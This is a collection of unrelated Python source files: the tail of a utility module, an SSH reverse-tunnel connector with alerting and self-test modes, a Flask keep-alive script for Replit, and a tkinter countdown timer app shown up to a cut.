res = json.loads(urlopen(url, timeout=ten_minutes).read())
return res
def spawn(f: Callable[[], None]) -> None:
threading.Thread(target=f, daemon=True).start()
def group_by(xs: Iterable[A], key: Callable[[A], B]) -> defaultdict[B, list[A]]:
d: dict[B, list[A]] = defaultdict(list)
for x in xs:
d[key(x)] += [x]
return d
def uniq(xs: Iterable[A]) -> Iterable[A]:
return {x: None for x in xs}.keys()
def flatten(xss: Iterable[list[A]]) -> list[A]:
return sum(xss, cast(list[A], []))
def catch(m: Callable[[], A], default: B) -> A | B:
try:
return m()
except:
return default
@dataclass(frozen=False)
class Mutable(Generic[A]):
value: A
@classmethod
def factory(cls, x: A):
return field(default_factory=lambda: cls(x))
@classmethod
def init(cls, f: Callable[[], A]):
return field(default_factory=lambda: cls(f()))
def read_commasep(s: str, p: Callable[[str], A] = lambda x: x) -> list[A]:
return [p(x.strip()) for x in s.strip().split(',') if x.strip()]
def now_str_for_filename() -> str:
return str(datetime.now()).split('.')[0].replace(' ', '_')
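# test() overloads == so that "test(expr) == expected" prints a green check when the 'verbose'
# environment variable is set and raises ValueError when the two sides differ; it is used for
# the module-level self-checks further down.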
@dataclass(frozen=True)
class test(Generic[A]):
lhs: A
def __eq__(self, rhs: A) -> bool:
if self.lhs == rhs:
import os
if os.environ.get('verbose'):
green = Color().green
print(green('✔ '), show(self.lhs))
print(green(' =='), show(rhs))
return True
else:
red = Color().red
print(red('✗ '), show(self.lhs))
print(red(' !='), show(rhs))
raise ValueError('Equality test failed')
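# iterate_with_full_context pairs every element with the full lists of elements before and after
# it; the _with_context, _with_next and _with_prev variants below are projections of that result.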
def iterate_with_full_context(xs: Iterable[A]) -> list[tuple[list[A], A, list[A]]]:
xs = list(xs)
return [
(xs[:i], x, xs[i+1:])
for i, x in enumerate(xs)
]
def iterate_with_context(xs: Iterable[A]) -> list[tuple[A | None, A, A | None]]:
return [
(prev[-1] if prev else None, x, next[0] if next else None)
for prev, x, next in iterate_with_full_context(xs)
]
def iterate_with_next(xs: Iterable[A]) -> list[tuple[A, A | None]]:
return [
(x, next)
for _, x, next in iterate_with_context(xs)
]
def iterate_with_prev(xs: Iterable[A]) -> list[tuple[A | None, A]]:
return [
(prev, x)
for prev, x, _ in iterate_with_context(xs)
]
test(iterate_with_full_context([1,2,3,4])) == [
([], 1, [2, 3, 4]),
([1], 2, [3, 4]),
([1, 2], 3, [4]),
([1, 2, 3], 4, []),
]
test(iterate_with_context([1,2,3,4])) == [
(None, 1, 2),
(1, 2, 3),
(2, 3, 4),
(3, 4, None)
]
def git_HEAD() -> str | None:
from subprocess import run
try:
proc = run(['git', 'rev-parse', 'HEAD'], capture_output=True)
return proc.stdout.decode().strip()[:8]
except:
return None
from datetime import timedelta
def pp_secs(seconds: int | float) -> str:
'''
Pretty-print seconds.
>>> pp_secs(0)
'0.0'
>>> pp_secs(0.1)
'0.1'
>>> pp_secs(0.09)
'0.0'
>>> pp_secs(60)
'1:00.0'
>>> pp_secs(3600)
'1:00:00.0'
>>> pp_secs(3600 + 60 * 2 + 3 + 0.4)
'1:02:03.4'
>>> pp_secs(3600 * 24 - 0.1)
'23:59:59.9'
>>> pp_secs(3600 * 24)
'1 day, 0:00:00.0'
>>> pp_secs(-0)
'0.0'
>>> pp_secs(-0.1)
'-0.1'
>>> pp_secs(-0.09)
'-0.0'
>>> pp_secs(-60)
'-1:00.0'
>>> pp_secs(-3600)
'-1:00:00.0'
>>> pp_secs(-(3600 + 60 * 2 + 3 + 0.4))
'-1:02:03.4'
>>> pp_secs(-(3600 * 24 - 0.1))
'-23:59:59.9'
>>> pp_secs(-(3600 * 24))
'-1 day, 0:00:00.0'
'''
if seconds < 0:
return '-' + pp_secs(-seconds)
s = str(timedelta(seconds=float(seconds)))
s = s.lstrip('0:')
if not s:
s = '0'
if s.startswith('.'):
s = '0' + s
if '.' in s:
pre, post = s.split('.')
return pre + '.' + post[:1]
else:
return s + '.0'
def round_nnz(x: float, ndigits: int=1) -> float:
'''
Round and normalize negative zero
'''
v = round(x, ndigits)
if v == -0.0:
return 0.0
else:
return v
def zip_with(f: Callable[[float, float], float], xs: list[float], ys: list[float], ndigits: int=1) -> list[float]:
return [round_nnz(f(a, b), ndigits=ndigits) for a, b in zip(xs, ys)]
def zip_sub(xs: list[float], ys: list[float], ndigits: int=1) -> list[float]:
return zip_with(lambda a, b: a - b, xs, ys, ndigits=ndigits)
def zip_add(xs: list[float], ys: list[float], ndigits: int=1) -> list[float]:
return zip_with(lambda a, b: a + b, xs, ys, ndigits=ndigits)
|
pytun.py
|
import argparse
import configparser
import os
import signal
import socket
import sys
import threading
import time
from concurrent.futures.thread import ThreadPoolExecutor
from multiprocessing import freeze_support
from os import listdir
from os.path import isabs, dirname, realpath
from os.path import isfile, join
import coloredlogs
from paramiko import BadHostKeyException, PasswordRequiredException, AuthenticationException, SSHException
import psutil
from alerts.email_alert import EmailAlertSender
from alerts.http_post_alert import HTTPPostAlertSender
from alerts.pooled_alerter import DifferentThreadAlert
from configure_logger import LogManager
from observation.connection_check import ConnectionCheck
from observation.http_server import inspection_http_server
from observation.status import Status
from tunnel_infra.TunnelProcess import TunnelProcess
from tunnel_infra.pathtype import PathType
from version import __version__
freeze_support()
INI_FILENAME = 'connector.ini'
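# main() reads connector.ini (or the file passed via --config_ini), handles the various --test_*
# modes, then starts one TunnelProcess per *.ini file found in the tunnel_dirs directory and
# keeps them alive in the monitoring loop below.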
def main():
parser = argparse.ArgumentParser(description='Tunnel')
parser.add_argument("--config_ini", dest="config_ini", help="Configuration file to use", default=INI_FILENAME,
type=PathType(dash_ok=False))
parser.add_argument("--test_smtp", dest="test_mail", help="Send a test email to validate the smtp config and exits",
action='store_true', default=False)
parser.add_argument("--test_http", dest="test_http", help="Send a test post to validate the http config and exits",
action='store_true', default=False)
parser.add_argument("--test_connections", dest="test_connections",
help="Test to connect to the exposed services for each connector", action='store_true',
default=False)
parser.add_argument("--test_tunnels", dest="test_connectors",
help="Test to establish each one of the connectors", action='store_true',
default=False)
parser.add_argument("--test_connectors", dest="test_connectors",
help="Test to establish each one of the connectors", action='store_true',
default=False)
parser.add_argument("--test_all", dest="test_all", help="Test connections", action="store_true", default=False)
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
args = parser.parse_args()
config = configparser.ConfigParser()
if not isabs(args.config_ini):
ini_path = join(dirname(realpath(__file__)), args.config_ini)
else:
ini_path = args.config_ini
pytun_ini_path = join(dirname(realpath(__file__)), 'pytun.ini')
if os.path.isfile(pytun_ini_path) and not os.path.isfile(join(dirname(realpath(__file__)), INI_FILENAME)):
os.rename(pytun_ini_path, join(dirname(realpath(__file__)), INI_FILENAME))
if os.path.isfile(ini_path):
config.read(ini_path)
if 'config-connector' in config:
params = config['config-connector']
else:
params = config['pytun']
else:
params = {}
test_something = args.test_mail or args.test_http or args.test_connections or args.test_connectors
tunnel_manager_id = params.get("tunnel_manager_id", '')
log_path = params.get("log_path", './logs')
if not isabs(log_path):
log_path = join(dirname(realpath(__file__)), log_path)
# Hack: sometimes when running on windows with pyinstaller and shawl a "\\?\" is added to cwd and it fails
if log_path.startswith("\\\\?\\"):
log_path = log_path.replace("\\\\?\\", "")
if not os.path.isdir(log_path):
os.mkdir(log_path)
LogManager.path = log_path
TunnelProcess.default_log_path = log_path
logger = LogManager.configure_logger('main_connector.log', params.get("log_level", "INFO"), test_something)
    if not tunnel_manager_id:
logger.error("tunnel_manager_id not set in the config file")
sys.exit(1)
smtp_sender = get_smtp_alert_sender(logger, tunnel_manager_id, params)
if args.test_mail:
test_mail_and_exit(logger, smtp_sender)
post_sender = get_post_alert_sender(logger, tunnel_manager_id, params)
if args.test_http:
test_http_and_exit(logger, post_sender)
tunnel_path = params.get("tunnel_dirs", "configs")
    if not isabs(tunnel_path):
tunnel_path = join(dirname(realpath(__file__)), tunnel_path)
# Hack: sometimes when running on windows with pyinstaller and shawl a "\\?\" is added to cwd and it fails
if tunnel_path.startswith("\\\\?\\"):
tunnel_path = tunnel_path.replace("\\\\?\\", "")
files = [join(tunnel_path, f) for f in listdir(tunnel_path) if isfile(join(tunnel_path, f)) and f[-4:] == '.ini']
processes = {}
if args.test_connections:
test_connections_and_exit(files, logger, processes)
if args.test_connectors:
test_tunnels_and_exit(files, logger, processes)
if args.test_all:
coloredlogs.install(level='DEBUG', logger=logger)
http_inspection_thread = None
if params == {}:
logger.info('Failed to load the ini file.')
elif tunnel_path is None:
logger.info('Tunnel path is invalid.')
else:
try:
address = get_inspection_address(params)
http_inspection = inspection_http_server(tunnel_path, tunnel_manager_id, LogManager.path, Status(),
__version__,
address, logger)
http_inspection_thread = threading.Thread(target=lambda: http_inspection.serve_forever())
http_inspection_thread.daemon = True
except OSError as e:
logger.exception(
f"Couldn't start inspection HTTP server. Address {address[0]}:{address[1]} already in use. "
f"Exception: {e}")
test_everything(files, logger, processes, introspection_thread=http_inspection_thread)
logger.info("Press Enter to continue...")
input()
sys.exit(0)
senders = [x for x in [smtp_sender, post_sender] if x is not None]
pool = ThreadPoolExecutor(1)
main_sender = DifferentThreadAlert(alerters=senders, logger=logger, process_pool=pool)
status = Status()
start_tunnels(files, logger, processes, senders, status)
if len(processes) == 0:
logger.exception("No config files found")
sys.exit(1)
register_signal_handlers(processes, pool)
http_inspection = inspection_http_server(tunnel_path, tunnel_manager_id, LogManager.path, status, __version__,
get_inspection_address(params), logger)
http_inspection_thread = threading.Thread(target=lambda: http_inspection.serve_forever())
http_inspection_thread.daemon = True
http_inspection_thread.start()
while True:
items = list(processes.items())
to_restart = []
check_tunnels(files, items, logger, processes, to_restart, pool, main_sender)
restart_tunnels(files, logger, processes, to_restart, senders, status)
if not http_inspection_thread.is_alive():
http_inspection_thread.join()
http_inspection_thread = threading.Thread(target=lambda: http_inspection.serve_forever())
http_inspection_thread.daemon = True
http_inspection_thread.start()
time.sleep(30)
def get_inspection_address(params):
only_local = bool(params.getboolean('inspection_localhost_only', True))
return "127.0.0.1" if only_local else "0.0.0.0", params.getint('inspection_port', 9999)
def test_everything(files, logger, processes, introspection_thread=None):
logger.info("We will check your installation and configuration")
service_up = test_service_is_running(logger)
if not service_up:
service_up = test_service_is_running(logger, service_name='InvgateConnector')
if not service_up:
logger.info("The service is not running! You won't be able to access your services from the cloud")
if introspection_thread:
introspection_thread.start()
failed_connection = test_connections(files, logger, processes)
if not failed_connection:
logger.info("All the services are reachable!")
else:
logger.info("Not all the services were reachable, please check the output")
if service_up:
logger.info(
"We will partially test the tunnels because the service is up. If you need further testing, please stop the service and repeat the test")
failed_tunnels = test_tunnels(files, logger, test_reverse_forward=not service_up)
if not failed_tunnels:
logger.info("All the connectors seem to work!")
else:
logger.info("Not all the connectors are working, check the output!")
def test_service_is_running(logger, service_name='InvGateTunnel'):
logger.info("Going to check the status of the service")
if os.name == 'nt':
try:
service = psutil.win_service_get(service_name)
service = service.as_dict()
except Exception as e:
return False
logger.info("%s Service is %s", service_name, service['status'])
return service['status'] == 'running'
else:
logger.info("We are not running on windows")
return False
def test_tunnels_and_exit(files, logger, processes):
failed = test_tunnels(files, logger)
if failed:
logger.error("Some connectors failed!")
sys.exit(4)
else:
logger.info("All the connectors worked!")
sys.exit(0)
def test_tunnels(files, logger, test_reverse_forward=True):
failed = False
for each in range(len(files)):
try:
config_file = files[each]
logger.info("Going to start connector from file %s", config_file)
try:
tunnel_process = TunnelProcess.from_config_file(config_file, [])
except Exception as e:
logger.exception(
"Failed to create connector from file %s. Configuration file may be incorrect. Error detail %s",
config_file, e)
failed = True
continue
tunnel_process.logger = logger
try:
client = tunnel_process.ssh_connect(exit_on_failure=False)
transport = client.get_transport()
except socket.timeout as e:
message = """Failed to connect with %s:%s. We received a connection timeout. Please check that you have internet access, that you can access to %s using telnet. Error %r"""
logger.exception(message % (tunnel_process.server_host, tunnel_process.server_port,
(tunnel_process.server_host, tunnel_process.server_port), e))
failed = True
continue
if test_reverse_forward:
try:
transport.request_port_forward("", tunnel_process.remote_port_to_forward)
transport.close()
except SSHException as e:
message = """Failed to connect with service %s:%s. We received a Port binding rejected error. That means that we could not open our connector completely.
Please check server_host, server_port and port in your config.
Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e))
failed = True
continue
client.close()
except BadHostKeyException as e:
message = """Failed to connect with service %s:%s. The host key given by the SSH server did not match what
we were expecting.
The hostname was %s,
the expected key was %s,
the key that we got was %s
Please check server_key in your config.
Detailed Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e.hostname,
e.expected_key.get_base64(), e.key.get_base64(), e))
failed = True
except AuthenticationException as e:
message = """Failed to connect with service %s:%s. The private key file was rejected.
Please check keyfile in your config
Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e))
failed = True
except PasswordRequiredException as e:
message = """Failed to connect with service %s:%s. The private key file is encrypted.
Please check keyfile and username in your config
Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e))
failed = True
except Exception as e:
failed = True
logger.exception("Failed to establish connector %s with error %r" %
(tunnel_process.tunnel_name, e))
return failed
def test_internet_access(logger):
host = "8.8.8.8"
port = 53
try:
socket.setdefaulttimeout(3)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
logger.info("It seems that we are able to access internet")
return True
except socket.error as ex:
logger.error("It seems that the server DOES NOT have internet access")
return False
def test_connections_and_exit(files, logger, processes):
failed = test_connections(files, logger, processes)
if failed:
logger.error("Some connections failed!")
sys.exit(3)
else:
logger.info("All the connections worked!")
sys.exit(0)
def test_connections(files, logger, processes):
create_tunnels_from_config([], files, logger, processes)
failed = False
test_internet_access(logger)
for key, tunnel_proc in processes.items():
with socket.socket() as sock:
try:
sock.settimeout(2)
sock.connect((tunnel_proc.remote_host, tunnel_proc.remote_port))
logger.info("Connection to %s:%s was successful", tunnel_proc.remote_host, tunnel_proc.remote_port)
except Exception as e:
logger.exception(
"Failed to connect with service %s:%s. Please check that you have internet access, that there is not a firewall blocking the connection or that remote_host and remote_port in your config are correct. Error %r" %
(tunnel_proc.remote_host, tunnel_proc.remote_port, e))
failed = True
return failed
def test_mail_and_exit(logger, smtp_sender):
if smtp_sender is None:
logger.error("No SMTP config found!")
sys.exit(2)
try:
smtp_sender.send_alert("Testing email", message="Testing email", exception_on_failure=True)
except Exception as e:
logger.exception("Failed to send email %r", e)
sys.exit(1)
logger.info("Mail test success!")
sys.exit(0)
def test_http_and_exit(logger, post_sender):
if post_sender is None:
logger.error("No http config found!")
sys.exit(2)
try:
post_sender.send_alert("Testing post", message="Testing email", exception_on_failure=True)
except Exception as e:
logger.exception("Failed to send post %r", e)
sys.exit(1)
logger.info("HTTP post test success!")
sys.exit(0)
def check_tunnels(files, items, logger, processes, to_restart, pool, pooled_sender):
for key, proc in items:
"""
pool.submit(ConnectionCheck(logger, pooled_sender).test_connection, proc.tunnel_name,
processes[key].remote_host,
processes[key].remote_port)
"""
if (not proc.is_alive()) and proc.exitcode is not None:
proc.terminate()
del processes[key]
to_restart.append(key)
logger.info("Connector %s is down", files[key])
pooled_sender.send_alert(proc.tunnel_name)
else:
logger.debug("Connector %s is up", files[key])
def restart_tunnels(files, logger, processes, to_restart, alert_senders, status):
for each in to_restart:
logger.info("Going to restart connector from file %s", files[each])
tunnel_process = TunnelProcess.from_config_file(files[each], alert_senders)
processes[each] = tunnel_process
tunnel_process.start()
status.start_tunnel(files[each])
logger.info("Connector %s has pid %s", tunnel_process.tunnel_name, tunnel_process.pid)
def register_signal_handlers(processes, pool):
def exit_gracefully(*args, **kwargs):
if pool:
pool.shutdown()
for each in processes.values():
each.terminate()
for each in processes.values():
each.join()
sys.exit(0)
signal.signal(signal.SIGINT, exit_gracefully)
signal.signal(signal.SIGTERM, exit_gracefully)
def start_tunnels(files, logger, processes, alert_senders, status):
create_tunnels_from_config(alert_senders, files, logger, processes)
for key, tunnel_process in processes.items():
tunnel_process.start()
status.start_tunnel(files[key])
logger.info("Connector %s has pid %s", tunnel_process.tunnel_name, tunnel_process.pid)
def create_tunnels_from_config(alert_senders, files, logger, processes):
for each in range(len(files)):
config_file = files[each]
logger.info("Going to start connector from file %s", config_file)
try:
tunnel_process = TunnelProcess.from_config_file(config_file, alert_senders)
except Exception as e:
logger.exception("Failed to create connector from file %s: %s", config_file, e)
for pr in processes.values():
pr.terminate()
sys.exit(1)
processes[each] = tunnel_process
def get_post_alert_sender(logger, tunnel_manager_id, params):
if params.get("http_url"):
try:
post_sender = HTTPPostAlertSender(tunnel_manager_id, params['http_url'], params['http_user'],
params['http_password'], logger)
except KeyError as e:
logger.exception("Missing smtp param %s" % e)
sys.exit(-1)
else:
post_sender = None
return post_sender
def get_smtp_alert_sender(logger, tunnel_manager_id, params):
if params.get("smtp_hostname"):
try:
smtp_sender = EmailAlertSender(tunnel_manager_id, params['smtp_hostname'], params.get('smtp_login', None),
params.get('smtp_password', None),
params['smtp_to'], logger,
port=params.getint('smtp_port', 25), from_address=params.get('smtp_from'),
security=params.get("smtp_security"))
except KeyError as e:
logger.exception("Missing smtp param %s" % e)
sys.exit(-1)
else:
smtp_sender = None
return smtp_sender
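# Illustrative alert-sender configuration (added for reference; not part of the
# original script). params exposes getint(), which suggests a configparser
# section; the section name and all values below are placeholders.
#
# [alerts]
# smtp_hostname = smtp.example.com
# smtp_port = 25
# smtp_from = tunnels@example.com
# smtp_to = ops@example.com
# smtp_login = alert-user
# smtp_password = secret
# smtp_security = starttls
# http_url = https://example.com/alert-hook
# http_user = alert-user
# http_password = secret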
if __name__ == '__main__':
main()
|
alive.py
|
# This file is used to keep the bot alive on a Replit server
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot started! Running..."
def run():
    app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
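# Hedged usage sketch (not part of the original file): call keep_alive() once
# before the bot's blocking run loop so Flask keeps answering uptime pings on
# port 8080 from a background thread. "bot" and "TOKEN" are hypothetical names
# for whatever client this Repl actually runs.
#
#   keep_alive()
#   bot.run(TOKEN)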
|
main.py
|
# TimerX v1.1
# IMPORTS
ver = "1.0"
import ctypes
import os
import time
import tkinter
import webbrowser
from platform import system
from re import T
from threading import Thread
from time import sleep
from tkinter import DISABLED, Frame, Grid, PhotoImage, StringVar, TclError, Tk, ttk
from tkinter.constants import LEFT
import darkdetect
import sv_ttk
from BlurWindow.blurWindow import *
from playsound import playsound
from utils import *
# CONFIG
theme = f"{darkdetect.theme()}"
if not os.path.isfile("./config.json"):
from utils import *
createConfig()
config = loadConfig(ver)
else:
config = loadConfig(ver)
if config["theme"] == "System":
if darkdetect.theme() == "Dark":
theme = "Dark"
else:
theme = "Light"
elif config["theme"] == "Dark":
theme = "Dark"
else:
theme = "Light"
# TKINTER WINDOW
app = Tk()
app.title("TimerX")
app.minsize(width=300, height=210)
sv_ttk.set_theme(theme.lower())
bg_color = ttk.Style().lookup(".", "background")
app.wm_attributes("-transparent", bg_color)
app.update()
HWND = ctypes.windll.user32.GetForegroundWindow()
# SYSTEM CODE
try:
if system() == "darwin":
app.iconbitmap(r"assets/logo_new.icns")
app.wm_attributes("-transparent", True)
app.config(bg="systemTransparent")
elif system() == "Windows":
app.iconbitmap(r"assets/logo_new.ico")
from win10toast_click import ToastNotifier
elif system() == "win":
app.iconphoto(r"assets/logo_new.ico")
else:
logo_img = PhotoImage(file="assets/images/logo_new.png")
app.iconphoto(False, logo_img)
except TclError:
pass
try:
app.iconphoto(r"assets/logo.ico")
except TclError:
pass
# VARIABLES
app_on = True
timer_on = False
timer_paused = False
timer_seconds = config["default_seconds"]
timer_minutes = config["default_minutes"]
timer_hours = config["default_hours"]
# FUNCTIONS
def playBuzzer(config):
playsound(config["sound_path"])
def startstopButtonPressed():
global timer_on, timer_paused, timer_hours, timer_minutes, timer_seconds, last_paused
if timer_on and timer_paused == False:
timer_on = False
timer_paused = True
last_paused = time.time()
timer_hours = hours_left
timer_minutes = minutes_left
timer_seconds = seconds_left
play_button.configure(text="Play")
elif timer_paused == False and timer_on == False:
play_button.configure(text="Pause")
timer_thread = Thread(target=runTimer, daemon=True)
timer_thread.start()
else:
timer_paused = False
timer_on = True
play_button.configure(text="Pause")
def saveTimer(timer_sec_input, timer_min_input, timer_hr_input, manager_app_window):
global timer_seconds, timer_minutes, timer_hours
timer_seconds = int(timer_sec_input.get())
timer_minutes = int(timer_min_input.get())
timer_hours = int(timer_hr_input.get())
config["default_seconds"] = timer_seconds
config["default_minutes"] = timer_minutes
config["default_hours"] = timer_hours
time_selected_display.configure(
text=f"{timer_hours} Hours, {timer_minutes} Minutes, {timer_seconds} Seconds"
)
time_display.configure(text=f"{timer_hours} : {timer_minutes} : {timer_seconds}")
manager_app_window.destroy()
def showNotification():
if system() == "Windows":
notification = ToastNotifier()
notification.show_toast(
"TimerX",
"Time's up!",
icon_path="./assets/logo_new.ico",
duration="None",
threaded=True,
callback_on_click=app.focus_force(),
)
def runTimer():
global timer_seconds, timer_minutes, timer_hours, timer_on, app, config, last_paused, seconds_left, minutes_left, hours_left
timer_seconds = config["default_seconds"]
timer_minutes = config["default_minutes"]
timer_hours = config["default_hours"]
seconds_left = timer_seconds
minutes_left = timer_minutes
hours_left = timer_hours
milliseconds_left = 99
timer_on = True
last_paused = time.time()
while True:
if timer_on and timer_paused == False:
latest_time = time.time()
time_to_subtract = round((latest_time - last_paused), 3)
split_time = str(time_to_subtract).split(".")
ty_res = time.gmtime(int(split_time[0]))
formatted_time = time.strftime(f"%H:%M:%S:{split_time[1]}", ty_res)
milliseconds_left -= int(split_time[1])
split_fmt_time = formatted_time.split(":")
hours_left = timer_hours - int(split_fmt_time[0])
minutes_left = timer_minutes - int(split_fmt_time[1])
seconds_left = timer_seconds - int(split_fmt_time[2])
if seconds_left < 0 and minutes_left == 0 and hours_left == 0:
break
if seconds_left < 0:
subtract_secs = abs(seconds_left)
seconds_left = 60 - subtract_secs
minutes_left -= 1
if minutes_left < 0:
subtract_mins = abs(minutes_left)
minutes_left = 60 - subtract_mins
hours_left -= 1
time_display.configure(
text=f"{hours_left} : {minutes_left} : {seconds_left}"
)
timer_on = False
play_button.config(text="Play")
if config["notify"]:
showNotification()
if config["sound"]:
playBuzzer(config)
def setAlwaysOnTop(app):
global config
if config["ontop"] == True:
app.attributes("-topmost", True)
else:
app.attributes("-topmost", False)
setAlwaysOnTop(app)
# WINDOWS
def createManagerWindow(saveTimer, current_mins, current_secs, current_hrs):
global manager_app_window, config
manager_app_window = tkinter.Toplevel()
manager_app_window.geometry("250x170")
manager_app_window.title("Edit Timer")
manager_app_window.attributes("-alpha", config["transperency"])
manager_app_window.resizable(False, False)
try:
if system() == "darwin":
manager_app_window.iconbitmap(r"assets/logo_new.icns")
manager_app_window.wm_attributes("-transparent", True)
manager_app_window.config(bg="systemTransparent")
elif system() == "Windows":
manager_app_window.iconbitmap(r"assets/logo_new.ico")
elif system() == "win":
manager_app_window.iconphoto(r"assets/logo_new.ico")
else:
logo_img = PhotoImage(file="assets/images/logo.png")
manager_app_window.iconphoto(False, logo_img)
except TclError:
pass
# VALIDATION
validate_command = manager_app_window.register(validate)
# WINDOW FRAME
manager_window = ttk.Frame(manager_app_window)
manager_window.pack(fill="both", expand=True)
timer_hr_label = ttk.Label(manager_window, text="Hours: ")
timer_hr_label.place(x=17, y=17)
timer_hr_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_hr_input.place(x=65, y=10)
timer_hr_input.insert(1, current_hrs)
timer_min_label = ttk.Label(manager_window, text="Minutes: ")
timer_min_label.place(x=13, y=57)
timer_min_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_min_input.place(x=65, y=50)
timer_min_input.insert(1, current_mins)
timer_sec_label = ttk.Label(manager_window, text="Seconds: ")
timer_sec_label.place(x=12, y=97)
timer_sec_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_sec_input.place(x=65, y=90)
timer_sec_input.insert(1, current_secs)
ok_button = ttk.Button(
manager_window,
text="Ok!",
command=lambda: saveTimer(
timer_sec_input, timer_min_input, timer_hr_input, manager_app_window
),
style="Accent.TButton",
)
ok_button.place(x=95, y=126)
def createSettingsWindow():
global theme, config, settings_window
settings_window = tkinter.Toplevel()
settings_window.geometry("500x320")
settings_window.title("Settings")
settings_window.resizable(False, False)
settings_window.attributes("-alpha", config["transperency"])
try:
if system() == "darwin":
settings_window.iconbitmap(r"assets/logo_new.icns")
settings_window.wm_attributes("-transparent", True)
settings_window.config(bg="systemTransparent")
elif system() == "Windows":
settings_window.iconbitmap(r"assets/logo_new.ico")
elif system() == "win":
settings_window.iconphoto(r"assets/logo_new.ico")
else:
logo_img = PhotoImage(file="assets/images/logo_new.png")
settings_window.iconphoto(False, logo_img)
except TclError:
pass
theme_dark = PhotoImage(file="./assets/images/dark/dark_theme.png")
theme_light = PhotoImage(file="./assets/images/light/dark_theme.png")
transparency_dark = PhotoImage(file="./assets/images/dark/transparency.png")
transparency_light = PhotoImage(file="./assets/images/light/transparency.png")
speaker_dark = PhotoImage(file="./assets/images/dark/speaker.png")
speaker_light = PhotoImage(file="./assets/images/light/speaker.png")
bell_dark = PhotoImage(file="./assets/images/dark/bell.png")
bell_light = PhotoImage(file="./assets/images/light/bell.png")
pin_dark = PhotoImage(file="./assets/images/dark/pin.png")
pin_light = PhotoImage(file="./assets/images/light/pin.png")
github_logo_dark = PhotoImage(file="./assets/images/dark/github.png")
github_logo_light = PhotoImage(file="./assets/images/light/github.png")
globe_dark = PhotoImage(file="./assets/images/dark/globe.png")
globe_light = PhotoImage(file="./assets/images/light/globe.png")
tabview = ttk.Notebook(settings_window)
tabview.pack(fill="both", expand=True)
tab_1 = ttk.Frame(tabview)
tab_2 = ttk.Frame(tabview)
tab_3 = ttk.Frame(tabview)
tabview.add(tab_1, text="Appearence")
tabview.add(tab_2, text="Notifications & Sound")
tabview.add(tab_3, text="About")
theme_label = ttk.Label(
tab_1,
text=" Change theme of the app",
image=theme_dark,
compound=LEFT,
)
theme_label.place(x=23, y=23)
transparency_label = ttk.Label(
tab_1,
text=" Adjust Transparency of the app",
image=transparency_dark,
compound=LEFT,
)
transparency_label.place(x=23, y=73)
speaker_label = ttk.Label(
tab_2,
text=" Play sound when timer ends",
image=speaker_dark,
compound=LEFT,
)
speaker_label.place(x=23, y=23)
bell_label = ttk.Label(
tab_2,
text=" Show notification when timer ends",
image=bell_dark,
compound=LEFT,
)
bell_label.place(x=23, y=73)
pin_label = ttk.Label(
tab_1, text=" Keep app always on top", image=pin_dark, compound=LEFT
)
pin_label.place(x=23, y=123)
logo = PhotoImage(file="./assets/logo_new_150x150.png")
logo_label = ttk.Label(tab_3, image=logo)
logo_label.place(x=50, y=30)
TimerX_Label = ttk.Label(tab_3, text="TimerX", font=("Arial Rounded MT Bold", 50))
TimerX_Label.place(x=210, y=40)
version_Label = ttk.Label(tab_3, text=f"Version: {ver}", font=("Segoe UI", "20"))
version_Label.place(x=220, y=120)
github_btn = ttk.Button(
tab_3,
text=" Fork on Github",
image=github_logo_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://github.com/Futura-Py/TimerX"),
)
github_btn.place(x=50, y=200)
website_btn = ttk.Button(
tab_3,
text=" Check out our Website!",
image=globe_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://Futura-Py.netlify.app/"),
)
website_btn.place(x=250, y=200)
if theme == "Dark":
github_btn.configure(image=github_logo_dark)
website_btn.configure(image=globe_dark)
elif theme == "Light":
github_btn.configure(image=github_logo_light)
website_btn.configure(image=globe_light)
if theme == "Dark":
theme_label.configure(image=theme_dark)
transparency_label.configure(image=transparency_dark)
speaker_label.configure(image=speaker_dark)
bell_label.configure(image=bell_dark)
pin_label.configure(image=pin_dark)
github_btn.configure(image=github_logo_dark)
website_btn.configure(image=globe_dark)
else:
theme_label.configure(image=theme_light)
transparency_label.configure(image=transparency_light)
speaker_label.configure(image=speaker_light)
bell_label.configure(image=bell_light)
pin_label.configure(image=pin_light)
github_btn.configure(image=github_logo_light)
website_btn.configure(image=globe_light)
box_slider_value = StringVar(settings_window)
if config["theme"] == "System":
box_slider_value.set("System")
elif theme == "Dark":
box_slider_value.set("Dark")
elif theme == "Light":
box_slider_value.set("Light")
theme_combobox = ttk.Spinbox(
tab_1,
state="readonly",
values=("Dark", "Light", "System"),
wrap=True,
textvariable=box_slider_value,
)
theme_combobox.place(x=275, y=20)
didsliderload = False
def slider_value():
return ".{:.0f}".format(slider.get())
def slider_changed(event):
if didsliderload:
settings_window.attributes("-alpha", slider_value())
app.attributes("-alpha", slider_value())
slider = ttk.Scale(
tab_1,
from_=25,
to=99,
orient="horizontal",
command=slider_changed,
)
slider.set(str(config["transperency"]).lstrip("."))
slider.place(x=325, y=75)
didsliderload = True
sound_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["sound"] == True:
sound_button.state(["!alternate", "selected"])
elif config["sound"] == False:
sound_button.state(["!alternate"])
sound_button.place(x=360, y=25)
notify_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["notify"] == True:
notify_button.state(["!alternate", "selected"])
elif config["notify"] == False:
notify_button.state(["!alternate"])
notify_button.place(x=360, y=75)
###
ontop_button = ttk.Checkbutton(tab_1, style="Switch.TCheckbutton")
if config["ontop"] == True:
ontop_button.state(["!alternate", "selected"])
elif config["ontop"] == False:
ontop_button.state(["!alternate"])
ontop_button.place(x=360, y=125)
def ApplyChanges():
global theme
config["theme"] = theme_combobox.get()
if config["theme"] == "System":
if darkdetect.isDark():
theme = "Dark"
else:
theme = "Light"
else:
theme = config["theme"]
config["transperency"] = slider_value()
